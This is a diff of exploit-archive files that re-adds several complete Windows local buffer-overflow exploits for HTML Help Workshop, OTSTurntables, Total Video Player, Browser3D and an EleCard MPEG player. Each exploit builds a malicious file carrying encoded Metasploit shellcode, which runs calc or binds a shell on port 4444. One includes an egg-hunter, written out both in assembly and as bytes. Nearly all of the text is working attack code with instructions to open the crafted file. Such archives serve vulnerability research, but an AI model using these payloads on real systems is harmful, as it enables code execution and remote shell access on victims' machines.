+"\x38\x4c\x4b\x33\x6f\x55\x70\x57\x71\x6a\x4b\x61\x59\x4c\x4b\x36".
+"\x54\x6e\x6b\x53\x31\x48\x6e\x55\x61\x39\x50\x4d\x49\x4c\x6c\x4d".
+"\x54\x6b\x70\x74\x34\x66\x67\x4b\x71\x78\x4a\x56\x6d\x67\x71\x39". +"\x52\x48\x6b\x4c\x34\x35\x6b\x62\x74\x56\x44\x57\x74\x54\x35\x6b". +"\x55\x4e\x6b\x31\x4f\x65\x74\x67\x71\x5a\x4b\x50\x66\x6c\x4b\x56". +"\x6c\x42\x6b\x6e\x6b\x53\x6f\x47\x6c\x67\x71\x7a\x4b\x6c\x4b\x45". +"\x4c\x6c\x4b\x47\x71\x48\x6b\x4f\x79\x33\x6c\x44\x64\x73\x34\x49". +"\x53\x70\x31\x6b\x70\x71\x74\x4e\x6b\x73\x70\x56\x50\x4b\x35\x49". +"\x50\x62\x58\x66\x6c\x4c\x4b\x43\x70\x56\x6c\x4c\x4b\x50\x70\x45". +"\x4c\x4c\x6d\x6c\x4b\x35\x38\x77\x78\x78\x6b\x67\x79\x4e\x6b\x6b". +"\x30\x6c\x70\x57\x70\x63\x30\x33\x30\x4c\x4b\x32\x48\x67\x4c\x73". +"\x6f\x35\x61\x48\x76\x71\x70\x56\x36\x6c\x49\x4a\x58\x6e\x63\x69". +"\x50\x41\x6b\x56\x30\x65\x38\x6c\x30\x6f\x7a\x75\x54\x73\x6f\x31". +"\x78\x4e\x78\x79\x6e\x6f\x7a\x36\x6e\x66\x37\x6b\x4f\x5a\x47\x52". +"\x43\x65\x31\x30\x6c\x70\x63\x45\x50\x46"; + + +#/----------------Advanced Shellhunter Code----------------\ +#01D717DD EB 1E JMP SHORT 01D717FD | +#01D717DF 83C4 64 ADD ESP,64 | +#01D717E2 83C4 64 ADD ESP,64 | +#01D717E5 83C4 64 ADD ESP,64 | +#01D717E8 83C4 64 ADD ESP,64 | +#01D717EB 83C4 64 ADD ESP,64 | +#01D717EE 83C4 64 ADD ESP,64 | +#01D717F1 83C4 64 ADD ESP,64 | +#01D717F4 83C4 64 ADD ESP,64 | +#01D717F7 83C4 64 ADD ESP,64 | +#01D717FA 83C4 54 ADD ESP,54 | +#01D717FD 33FF XOR EDI,EDI | +#01D717FF BA D0FAFD7F MOV EDX,7FFDFAD0 | +#01D71804 8B3A MOV EDI,DWORD PTR DS:[EDX] | +#01D71806 EB 0E JMP SHORT 01D71816 | +#01D71808 58 POP EAX | +#01D71809 83E8 3C SUB EAX,3C | +#01D7180C 50 PUSH EAX | +#01D7180D 6A FF PUSH -1 | +#01D7180F 33DB XOR EBX,EBX | +#01D71811 64:8923 MOV DWORD PTR FS:[EBX],ESP | +#01D71814 EB 05 JMP SHORT 01D7181B | +#01D71816 E8 EDFFFFFF CALL 01D71808 | +#01D7181B B8 12121212 MOV EAX,12121212 | +#01D71820 6BC0 02 IMUL EAX,EAX,2 | +#01D71823 BA D0FAFD7F MOV EDX,7FFDFAD0 | +#01D71828 83C7 20 ADD EDI,20 | +#01D7182B 893A MOV DWORD PTR DS:[EDX],EDI | +#01D7182D 3907 CMP DWORD PTR DS:[EDI],EAX | +#01D7182F ^75 F7 JNZ SHORT 01D71828 | 
+#01D71831 83C7 04 ADD EDI,4 | +#01D71834 6BC0 02 IMUL EAX,EAX,2 | +#01D71837 3907 CMP DWORD PTR DS:[EDI],EAX | +#01D71839 ^75 E0 JNZ SHORT 01D7181B | +#01D7183B 83C7 04 ADD EDI,4 | +#01D7183E B8 42424242 MOV EAX,42424242 | +#01D71843 3907 CMP DWORD PTR DS:[EDI],EAX | +#01D71845 ^75 D4 JNZ SHORT 01D7181B | +#01D71847 83C7 04 ADD EDI,4 | +#01D7184A FFE7 JMP EDI | +#\-----------------------End of Code----------------------/ + +my $shellhunter = "\xeb\x1e". + "\x83\xc4\x64". + "\x83\xc4\x64". + "\x83\xc4\x64". + "\x83\xc4\x64". + "\x83\xc4\x64". + "\x83\xc4\x64". + "\x83\xc4\x64". + "\x83\xc4\x64". + "\x83\xc4\x64". + "\x83\xc4\x54". + "\x33\xff". + "\xba\xd0\xfa\xfd\x7f". + "\x8b\x3a". + "\xeb\x0e". + "\x58". + "\x83\xe8\x3c". + "\x50". + "\x6a\xff". + "\x33\xdb". + "\x64\x89\x23". + "\xeb\x05". + "\xe8\xed\xff\xff\xff". + "\xb8\x12\x12\x12\x12". + "\x6b\xc0\x02". + "\xba\xd0\xfa\xfd\x7f". + "\x83\xc7\x20". + "\x89\x3a". + "\x39\x07". + "\x75\xf7". + "\x83\xc7\x04". + "\x6b\xc0\x02". + "\x39\x07". + "\x75\xe0". + "\x83\xc7\x04". + "\xb8\x42\x42\x42\x42". + "\x39\x07". + "\x75\xd4". + "\x83\xc7\x04". + "\xff\xe7"; +my $lookout1 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42" x 64; +my $lookout2 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42" x 64; +my $lookout3 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42" x 64; +my $lookout4 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42\x42" x 64; +my $len = 280 - (length($shellhunter) + 55); +my $overflow1 = "\x41" x $len; +my $overflow2 = "\x41" x 55; +my $overflow3 = "\x42" x 256; +my $ret = "\x93\x1f\x40\x00"; #0x00401f93 CALL EDI [hhw.exe] + + +open(my $hhpprj_file, "> s.hhp"); +print $hhpprj_file $hhp_data1. + $overflow1.$shellhunter.$overflow2.$ret. + $crlf.$crlf. + $hhp_data2. + $overflow3.$lookout1.$lookout2.$lookout3.$lookout4.$shellcode.$overflow3. + $crlf; +close $hhpprj_file; + +# milw0rm.com [2009-01-12] 
diff --git a/platforms/windows/local/7765.py b/platforms/windows/local/7765.py
index 271850cb9..e9b53b813 100755
--- a/platforms/windows/local/7765.py
+++ b/platforms/windows/local/7765.py
@@ -1,45 +1,45 @@ -# OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit -# Discovered & exploited bY suN8Hclf -# crimson.loyd@gmail.com, blacksideofthesun.linuxsecured.net -# Tested on: Windows XP SP2 Polish Full patched -# -# Only 274 bytes for shellcode. Wanna more, exploit SEH !!! -# -# Thanks to Myo and to everyone who knows what hacking really is -# Not for money dude, only for fun !!! - -print "=====================================================================" -print " OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit" -print " bY suN8Hclf (crimson.loyd@gmail.com)" -print "=====================================================================" - -nops = "\x90" * 4 -ret = "\x75\x52\x46"; # call ebx - -# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com -shellcode = ( - "\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9" - "\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05" - "\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09" - "\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d" - "\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26" - "\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64" - "\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb" - "\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28" - "\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44" - "\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38" - "\xac\x2c\xc9\x40" - ) -num = 276 - 4 - 160 -buff = "\x41" * num - -exploit = nops + shellcode + buff + ret -try: - out_file = open("open_me.ofl",'w') - out_file.write(exploit) - out_file.close() - raw_input("\nNow open open_me.ofl file to exploit bug!\n") -except: - print "WTF?" 
- -# milw0rm.com [2009-01-14] +# OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit +# Discovered & exploited bY suN8Hclf +# crimson.loyd@gmail.com, blacksideofthesun.linuxsecured.net +# Tested on: Windows XP SP2 Polish Full patched +# +# Only 274 bytes for shellcode. Wanna more, exploit SEH !!! +# +# Thanks to Myo and to everyone who knows what hacking really is +# Not for money dude, only for fun !!! + +print "=====================================================================" +print " OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit" +print " bY suN8Hclf (crimson.loyd@gmail.com)" +print "=====================================================================" + +nops = "\x90" * 4 +ret = "\x75\x52\x46"; # call ebx + +# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com +shellcode = ( + "\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9" + "\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05" + "\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09" + "\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d" + "\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26" + "\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64" + "\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb" + "\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28" + "\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44" + "\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38" + "\xac\x2c\xc9\x40" + ) +num = 276 - 4 - 160 +buff = "\x41" * num + +exploit = nops + shellcode + buff + ret +try: + out_file = open("open_me.ofl",'w') + out_file.write(exploit) + out_file.close() + raw_input("\nNow open open_me.ofl file to exploit bug!\n") +except: + print "WTF?" + +# milw0rm.com [2009-01-14] diff --git a/platforms/windows/local/7839.py b/platforms/windows/local/7839.py index 1f2fa5f06..56b55aca7 100755 
--- a/platforms/windows/local/7839.py
+++ b/platforms/windows/local/7839.py
@@ -1,53 +1,53 @@ -#!/usr/bin/python -import socket -print "******************************************************" -print " Total Video Player V1.31 Local Stack Overflow\n" -print " Author: His0k4" -print " Tested on: Windows XP Pro SP2 Fr\n" -print " Greetings to:" -print " All friends & muslims HaCkers(dz)\n" -print " dz-secure.com\n snakespc.com\n dz-security.net" -print "******************************************************" - -header1 = ( - "\x5B\x57\x69\x6E\x64\x6F\x77\x73\x5D\x0A\x50\x6C\x69\x73\x74\x57" - "\x69\x6E\x64\x6F\x77\x20\x3D\x20\x70\x6C\x73\x2E\x64\x6C\x6C\x2C" - "\x49\x44\x0A\x0A\x5B\x4D\x61\x69\x6E\x57\x69\x6E\x64\x6F\x77\x53" - "\x43\x52\x45\x45\x4E\x5D\x4D\x61\x69\x6E\x3D\x4E\x6F\x72\x6D\x61" - "\x6C\x2E\x62\x6D\x70\x0A\x0A\x5B\x50\x6C\x69\x73\x74\x57\x69\x6E" - "\x64\x6F\x77\x53\x43\x52\x45\x45\x4E\x5D\x0A\x4D\x61\x69\x6E\x3D" - "\x50\x4C\x42\x75\x74\x74\x6F\x6E\x4E\x6F\x72\x6D\x61\x6C\x2E\x62" - "\x6D\x70\x0A\x0A\x5B\x50\x6C\x69\x73\x74\x57\x69\x6E\x64\x6F\x77" - "\x4C\x49\x53\x54\x43\x54\x52\x4C\x53\x54\x59\x4C\x45\x5D\x0A\x43" - "\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x53\x70\x61\x6E\x3D") - -header2=( - "\x2E\x62\x6D\x70\x0A\x56\x65\x72\x74\x69\x63\x6C\x65\x53\x63\x72" - "\x6F\x6C\x6C\x42\x61\x72\x54\x68\x75\x6D\x62\x3D\x56\x65\x72\x74" - "\x69\x63\x6C\x65\x53\x63\x72\x6F\x6C\x6C\x42\x61\x72\x54\x68\x75" - "\x6D\x62\x2E\x62\x6D\x70") - -# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com -shellcode=( - "\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd5" - "\xc5\x35\xef\x83\xeb\xfc\xe2\xf4\x29\x2d\x71\xef\xd5\xc5\xbe\xaa" - "\xe9\x4e\x49\xea\xad\xc4\xda\x64\x9a\xdd\xbe\xb0\xf5\xc4\xde\xa6" - "\x5e\xf1\xbe\xee\x3b\xf4\xf5\x76\x79\x41\xf5\x9b\xd2\x04\xff\xe2" - "\xd4\x07\xde\x1b\xee\x91\x11\xeb\xa0\x20\xbe\xb0\xf1\xc4\xde\x89" - "\x5e\xc9\x7e\x64\x8a\xd9\x34\x04\x5e\xd9\xbe\xee\x3e\x4c\x69\xcb" - "\xd1\x06\x04\x2f\xb1\x4e\x75\xdf\x50\x05\x4d\xe3\x5e\x85\x39\x64" - 
"\xa5\xd9\x98\x64\xbd\xcd\xde\xe6\x5e\x45\x85\xef\xd5\xc5\xbe\x87" - "\xe9\x9a\x04\x19\xb5\x93\xbc\x17\x56\x05\x4e\xbf\xbd\x35\xbf\xeb" - "\x8a\xad\xad\x11\x5f\xcb\x62\x10\x32\xa6\x54\x83\xb6\xc5\x35\xef") - -buffer = header1 + "\x41"*221 + "\x7C\xE1\xA7\x7C" + "\x90"*20 + shellcode + header2 - -try: - out_file = open("DefaultSkin.ini",'w') - out_file.write(buffer) - out_file.close() - print("\n Exploit file created!, Now replace this file in Skins\DefaultSkin folder\n and run the program\n") -except: - print "Error" - -# milw0rm.com [2009-01-20] +#!/usr/bin/python +import socket +print "******************************************************" +print " Total Video Player V1.31 Local Stack Overflow\n" +print " Author: His0k4" +print " Tested on: Windows XP Pro SP2 Fr\n" +print " Greetings to:" +print " All friends & muslims HaCkers(dz)\n" +print " dz-secure.com\n snakespc.com\n dz-security.net" +print "******************************************************" + +header1 = ( + "\x5B\x57\x69\x6E\x64\x6F\x77\x73\x5D\x0A\x50\x6C\x69\x73\x74\x57" + "\x69\x6E\x64\x6F\x77\x20\x3D\x20\x70\x6C\x73\x2E\x64\x6C\x6C\x2C" + "\x49\x44\x0A\x0A\x5B\x4D\x61\x69\x6E\x57\x69\x6E\x64\x6F\x77\x53" + "\x43\x52\x45\x45\x4E\x5D\x4D\x61\x69\x6E\x3D\x4E\x6F\x72\x6D\x61" + "\x6C\x2E\x62\x6D\x70\x0A\x0A\x5B\x50\x6C\x69\x73\x74\x57\x69\x6E" + "\x64\x6F\x77\x53\x43\x52\x45\x45\x4E\x5D\x0A\x4D\x61\x69\x6E\x3D" + "\x50\x4C\x42\x75\x74\x74\x6F\x6E\x4E\x6F\x72\x6D\x61\x6C\x2E\x62" + "\x6D\x70\x0A\x0A\x5B\x50\x6C\x69\x73\x74\x57\x69\x6E\x64\x6F\x77" + "\x4C\x49\x53\x54\x43\x54\x52\x4C\x53\x54\x59\x4C\x45\x5D\x0A\x43" + "\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x53\x70\x61\x6E\x3D") + +header2=( + "\x2E\x62\x6D\x70\x0A\x56\x65\x72\x74\x69\x63\x6C\x65\x53\x63\x72" + "\x6F\x6C\x6C\x42\x61\x72\x54\x68\x75\x6D\x62\x3D\x56\x65\x72\x74" + "\x69\x63\x6C\x65\x53\x63\x72\x6F\x6C\x6C\x42\x61\x72\x54\x68\x75" + "\x6D\x62\x2E\x62\x6D\x70") + +# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub 
http://metasploit.com +shellcode=( + "\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd5" + "\xc5\x35\xef\x83\xeb\xfc\xe2\xf4\x29\x2d\x71\xef\xd5\xc5\xbe\xaa" + "\xe9\x4e\x49\xea\xad\xc4\xda\x64\x9a\xdd\xbe\xb0\xf5\xc4\xde\xa6" + "\x5e\xf1\xbe\xee\x3b\xf4\xf5\x76\x79\x41\xf5\x9b\xd2\x04\xff\xe2" + "\xd4\x07\xde\x1b\xee\x91\x11\xeb\xa0\x20\xbe\xb0\xf1\xc4\xde\x89" + "\x5e\xc9\x7e\x64\x8a\xd9\x34\x04\x5e\xd9\xbe\xee\x3e\x4c\x69\xcb" + "\xd1\x06\x04\x2f\xb1\x4e\x75\xdf\x50\x05\x4d\xe3\x5e\x85\x39\x64" + "\xa5\xd9\x98\x64\xbd\xcd\xde\xe6\x5e\x45\x85\xef\xd5\xc5\xbe\x87" + "\xe9\x9a\x04\x19\xb5\x93\xbc\x17\x56\x05\x4e\xbf\xbd\x35\xbf\xeb" + "\x8a\xad\xad\x11\x5f\xcb\x62\x10\x32\xa6\x54\x83\xb6\xc5\x35\xef") + +buffer = header1 + "\x41"*221 + "\x7C\xE1\xA7\x7C" + "\x90"*20 + shellcode + header2 + +try: + out_file = open("DefaultSkin.ini",'w') + out_file.write(buffer) + out_file.close() + print("\n Exploit file created!, Now replace this file in Skins\DefaultSkin folder\n and run the program\n") +except: + print "Error" + +# milw0rm.com [2009-01-20] diff --git a/platforms/windows/local/7843.c b/platforms/windows/local/7843.c index 952a4b023..16254da41 100755 --- a/platforms/windows/local/7843.c +++ b/platforms/windows/local/7843.c 
@@ -1,42 +1,42 @@ -#include<stdio.h> -#include<string.h> -#include<windows.h> - -/* Browser3D local BOF exploit -* coded by SimO-s0fT ( maroc-anti-connexion@hotmail.com) -*greetz to: all friends & all morroccan hackers -*special tnx for str0ke -/* win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com */ -unsigned char scode[] = -"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc2" -"\xf8\x23\x02\x83\xeb\xfc\xe2\xf4\x3e\x10\x67\x02\xc2\xf8\xa8\x47" -"\xfe\x73\x5f\x07\xba\xf9\xcc\x89\x8d\xe0\xa8\x5d\xe2\xf9\xc8\x4b" -"\x49\xcc\xa8\x03\x2c\xc9\xe3\x9b\x6e\x7c\xe3\x76\xc5\x39\xe9\x0f" -"\xc3\x3a\xc8\xf6\xf9\xac\x07\x06\xb7\x1d\xa8\x5d\xe6\xf9\xc8\x64" -"\x49\xf4\x68\x89\x9d\xe4\x22\xe9\x49\xe4\xa8\x03\x29\x71\x7f\x26" -"\xc6\x3b\x12\xc2\xa6\x73\x63\x32\x47\x38\x5b\x0e\x49\xb8\x2f\x89" -"\xb2\xe4\x8e\x89\xaa\xf0\xc8\x0b\x49\x78\x93\x02\xc2\xf8\xa8\x6a" -"\xfe\xa7\x12\xf4\xa2\xae\xaa\xfa\x41\x38\x58\x52\xaa\x08\xa9\x06" -"\x9d\x90\xbb\xfc\x48\xf6\x74\xfd\x25\x9b\x42\x6e\xa1\xf8\x23\x02"; -int main(int argc,char *argv[]){ - printf("\t ===>viva marrakesh city<===\t\n"); - FILE *openfile; - char exploit[430]; - char junk[262]; - char ret[]="\x68\xD5\x85\7C";//jmp kernel32.dll esp (windows trust sp2) - char nop[]="\x90\x90\x90\x90"; - memset(junk,0x90,262); - memcpy(exploit,junk,strlen(junk)); - memcpy(exploit+strlen(junk),ret,strlen(ret)); - memcpy(exploit+strlen(junk)+strlen(ret),nop,strlen(nop)); - memcpy(exploit+strlen(junk)+strlen(ret)+strlen(nop),scode,160); - openfile=fopen("simo.sfs","wb"); - if(openfile==NULL){ perror("can't opening this file\n"); } - fwrite(exploit,1,sizeof(exploit),openfile); - fclose(openfile); - printf("file created ....!" 
- "open it whit Browser3d");
- return 0;
-}
-
-// milw0rm.com [2009-01-22]
+#include<stdio.h>
+#include<string.h>
+#include<windows.h>
+
+/* Browser3D local BOF exploit
+* coded by SimO-s0fT ( maroc-anti-connexion@hotmail.com)
+*greetz to: all friends & all morroccan hackers
+*special tnx for str0ke
+/* win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com */
+unsigned char scode[] =
+"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc2"
+"\xf8\x23\x02\x83\xeb\xfc\xe2\xf4\x3e\x10\x67\x02\xc2\xf8\xa8\x47"
+"\xfe\x73\x5f\x07\xba\xf9\xcc\x89\x8d\xe0\xa8\x5d\xe2\xf9\xc8\x4b"
+"\x49\xcc\xa8\x03\x2c\xc9\xe3\x9b\x6e\x7c\xe3\x76\xc5\x39\xe9\x0f"
+"\xc3\x3a\xc8\xf6\xf9\xac\x07\x06\xb7\x1d\xa8\x5d\xe6\xf9\xc8\x64"
+"\x49\xf4\x68\x89\x9d\xe4\x22\xe9\x49\xe4\xa8\x03\x29\x71\x7f\x26"
+"\xc6\x3b\x12\xc2\xa6\x73\x63\x32\x47\x38\x5b\x0e\x49\xb8\x2f\x89"
+"\xb2\xe4\x8e\x89\xaa\xf0\xc8\x0b\x49\x78\x93\x02\xc2\xf8\xa8\x6a"
+"\xfe\xa7\x12\xf4\xa2\xae\xaa\xfa\x41\x38\x58\x52\xaa\x08\xa9\x06"
+"\x9d\x90\xbb\xfc\x48\xf6\x74\xfd\x25\x9b\x42\x6e\xa1\xf8\x23\x02";
+int main(int argc,char *argv[]){
+ printf("\t ===>viva marrakesh city<===\t\n");
+ FILE *openfile;
+ char exploit[430];
+ char junk[262];
+ char ret[]="\x68\xD5\x85\7C";//jmp kernel32.dll esp (windows trust sp2)
+ char nop[]="\x90\x90\x90\x90";
+ memset(junk,0x90,262);
+ memcpy(exploit,junk,strlen(junk));
+ memcpy(exploit+strlen(junk),ret,strlen(ret));
+ memcpy(exploit+strlen(junk)+strlen(ret),nop,strlen(nop));
+ memcpy(exploit+strlen(junk)+strlen(ret)+strlen(nop),scode,160);
+ openfile=fopen("simo.sfs","wb");
+ if(openfile==NULL){ perror("can't opening this file\n"); }
+ fwrite(exploit,1,sizeof(exploit),openfile);
+ fclose(openfile);
+ printf("file created ....!"
+ "open it whit Browser3d");
+ return 0;
+}
+
+// milw0rm.com [2009-01-22]
diff --git a/platforms/windows/local/7848.pl b/platforms/windows/local/7848.pl
index dacd635e5..bd32edd28 100755
--- a/platforms/windows/local/7848.pl
+++ b/platforms/windows/local/7848.pl
@@ -1,47 +1,47 @@ -#!/usr/bin/perl -# By ALpHaNiX -# NullArea.Net -# THanks - -system("color 5"); - -if (@ARGV != 1) { &help; exit(); } - -sub help(){ - print "[X] Usage : ./exploit.pl filename \n"; -} - -{ $file = $ARGV[0]; } -print "\n [X]*************************************************\n"; -print " [X]Browser3D(.sfs file) Local Stack Overflow Exploit*\n"; -print " [X] Coded By AlpHaNiX *\n"; -print " [X] From Null Area [NullArea.Net] *\n"; -print " [X]**************************************************\n\n"; - -print "[+] Exploiting.....\n" ; - -my $acc="\x41" x 300 ; -# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub -http://metasploit.com -my $shellcode = -"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5d". -"\x7e\xf1\x8c\x83\xeb\xfc\xe2\xf4\xa1\x96\xb5\x8c\x5d\x7e\x7a\xc9". -"\x61\xf5\x8d\x89\x25\x7f\x1e\x07\x12\x66\x7a\xd3\x7d\x7f\x1a\xc5". -"\xd6\x4a\x7a\x8d\xb3\x4f\x31\x15\xf1\xfa\x31\xf8\x5a\xbf\x3b\x81". -"\x5c\xbc\x1a\x78\x66\x2a\xd5\x88\x28\x9b\x7a\xd3\x79\x7f\x1a\xea". -"\xd6\x72\xba\x07\x02\x62\xf0\x67\xd6\x62\x7a\x8d\xb6\xf7\xad\xa8". -"\x59\xbd\xc0\x4c\x39\xf5\xb1\xbc\xd8\xbe\x89\x80\xd6\x3e\xfd\x07". -"\x2d\x62\x5c\x07\x35\x76\x1a\x85\xd6\xfe\x41\x8c\x5d\x7e\x7a\xe4". -"\x61\x21\xc0\x7a\x3d\x28\x78\x74\xde\xbe\x8a\xdc\x35\x8e\x7b\x88". 
-"\x02\x16\x69\x72\xd7\x70\xa6\x73\xba\x1d\x90\xe0\x3e\x7e\xf1\x8c"; -my $ret ="\x1a\x0f\x46\x77" ; # jmp ESP in Windows VISTA -my $nop ="\x90" x 20 ;# some lame nops lol -my $exploit = $acc.$ret.$nop.$shellcode; -print "[+] Creating Evil File" ; -open($FILE, ">>$file") or die "Cannot open $file"; -print $FILE $exploit; -close($FILE); -print "\n[+] Please wait while creating $file"; -print "\n[+] $file has been created"; - -# milw0rm.com [2009-01-22] +#!/usr/bin/perl +# By ALpHaNiX +# NullArea.Net +# THanks + +system("color 5"); + +if (@ARGV != 1) { &help; exit(); } + +sub help(){ + print "[X] Usage : ./exploit.pl filename \n"; +} + +{ $file = $ARGV[0]; } +print "\n [X]*************************************************\n"; +print " [X]Browser3D(.sfs file) Local Stack Overflow Exploit*\n"; +print " [X] Coded By AlpHaNiX *\n"; +print " [X] From Null Area [NullArea.Net] *\n"; +print " [X]**************************************************\n\n"; + +print "[+] Exploiting.....\n" ; + +my $acc="\x41" x 300 ; +# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub +http://metasploit.com +my $shellcode = +"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5d". +"\x7e\xf1\x8c\x83\xeb\xfc\xe2\xf4\xa1\x96\xb5\x8c\x5d\x7e\x7a\xc9". +"\x61\xf5\x8d\x89\x25\x7f\x1e\x07\x12\x66\x7a\xd3\x7d\x7f\x1a\xc5". +"\xd6\x4a\x7a\x8d\xb3\x4f\x31\x15\xf1\xfa\x31\xf8\x5a\xbf\x3b\x81". +"\x5c\xbc\x1a\x78\x66\x2a\xd5\x88\x28\x9b\x7a\xd3\x79\x7f\x1a\xea". +"\xd6\x72\xba\x07\x02\x62\xf0\x67\xd6\x62\x7a\x8d\xb6\xf7\xad\xa8". +"\x59\xbd\xc0\x4c\x39\xf5\xb1\xbc\xd8\xbe\x89\x80\xd6\x3e\xfd\x07". +"\x2d\x62\x5c\x07\x35\x76\x1a\x85\xd6\xfe\x41\x8c\x5d\x7e\x7a\xe4". +"\x61\x21\xc0\x7a\x3d\x28\x78\x74\xde\xbe\x8a\xdc\x35\x8e\x7b\x88". 
+"\x02\x16\x69\x72\xd7\x70\xa6\x73\xba\x1d\x90\xe0\x3e\x7e\xf1\x8c";
+my $ret ="\x1a\x0f\x46\x77" ; # jmp ESP in Windows VISTA
+my $nop ="\x90" x 20 ;# some lame nops lol
+my $exploit = $acc.$ret.$nop.$shellcode;
+print "[+] Creating Evil File" ;
+open($FILE, ">>$file") or die "Cannot open $file";
+print $FILE $exploit;
+close($FILE);
+print "\n[+] Please wait while creating $file";
+print "\n[+] $file has been created";
+
+# milw0rm.com [2009-01-22]
diff --git a/platforms/windows/local/7853.pl b/platforms/windows/local/7853.pl
index ed6214685..dc1d76195 100755
--- a/platforms/windows/local/7853.pl
+++ b/platforms/windows/local/7853.pl
@@ -1,94 +1,94 @@ -#!/usr/bin/perl -# By ALpHaNiX -# NullArea.Net -# THanks -#EAX 00000000 -#ECX 41414141 -#EDX 775A104D -#EBX 00000000 -#ESP 0012C280 -#EBP 0012C2A0 -#ESI 00000000 -#EDI 00000000 -#EIP 41414141 - -system("color 5"); - -if (@ARGV != 1) { &help; exit(); } - -sub help(){ - print "[X] Usage : ./exploit.pl filename \n"; -} - -{ $file = $ARGV[0]; } -print "\n [X]*************************************************\n"; -print " [X]EleCard MPEG PLAYER Local Stack Overflow Exploit *\n"; -print " [X] Coded By AlpHaNiX *\n"; -print " [X] From Null Area [NullArea.Net] *\n"; -print " [X]**************************************************\n\n"; - -print "[+] Exploiting.....\n" ; - -my $buff="http://"."\x41" x 969 ; -my $nop ="\x90" x 6000 ; -my $ret ="\xB3\x37\x8D\x6E" ; # JMP ESP In DDRAW.Dll In Windows -Vista Ultimate English - -# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum -http://metasploit.com -my $shellcode = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e". -"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58". -"\x4e\x36\x46\x52\x46\x42\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x37". -"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x58". -"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x53\x4b\x58". -"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c". 